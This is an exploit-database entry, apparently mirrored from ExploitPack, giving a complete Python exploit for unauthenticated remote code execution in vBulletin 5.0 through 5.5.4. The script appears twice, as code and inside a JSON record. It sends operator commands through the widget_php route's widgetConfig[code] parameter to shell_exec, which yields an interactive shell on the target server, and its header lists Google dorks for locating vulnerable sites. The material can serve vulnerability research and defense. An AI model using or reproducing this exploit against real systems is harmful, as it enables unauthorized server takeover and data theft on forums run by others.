Search...

vBulletin 5.0 5.5.4 - widget_php Unauthenticated Remote Code Execution

2019-09-23T00:00:00

ID EXPLOITPACK:777D6227CA649947B181E718CD852651
Type exploitpack
Reporter anonymous
Modified 2019-09-23T00:00:00

Description

vBulletin 5.0 5.5.4 - widget_php Unauthenticated Remote Code Execution

                                        
                                            #!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s &lt;URL to vBulletin&gt;" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T20:41:02", "references": [], "description": "\nvBulletin 5.0 5.5.4 - widget_php Unauthenticated Remote Code Execution", "edition": 1, "reporter": "anonymous", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2019-09-23T00:00:00", "title": "vBulletin 5.0 5.5.4 - widget_php Unauthenticated Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T20:41:02", "rev": 2}, "score": {"value": 0.6, "vector": "NONE", "modified": "2020-04-01T20:41:02", "rev": 2}, "vulnersScore": 0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2019-09-23T00:00:00", "id": "EXPLOITPACK:777D6227CA649947B181E718CD852651", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/python\n#\n# vBulletin 5.x 0day pre-auth RCE exploit\n# \n# This should work on all versions from 5.0.0 till 5.5.4\n#\n# Google Dorks:\n# - site:*.vbulletin.net\n# - \"Powered by vBulletin Version 5.5.4\"\n\nimport requests\nimport sys\n\nif len(sys.argv) != 2:\n sys.exit(\"Usage: %s <URL to vBulletin>\" % sys.argv[0])\n\nparams = {\"routestring\":\"ajax/render/widget_php\"}\n\nwhile True:\n try:\n cmd = raw_input(\"vBulletin$ \")\n params[\"widgetConfig[code]\"] = \"echo shell_exec('\"+cmd+\"'); exit;\"\n r = requests.post(url = sys.argv[1], data = params)\n if r.status_code == 200:\n print r.text\n else:\n sys.exit(\"Exploit failed! :(\")\n except KeyboardInterrupt:\n sys.exit(\"\\nClosing shell...\")\n except Exception, e:\n sys.exit(str(e))", "cvss": {"score": 0.0, "vector": "NONE"}}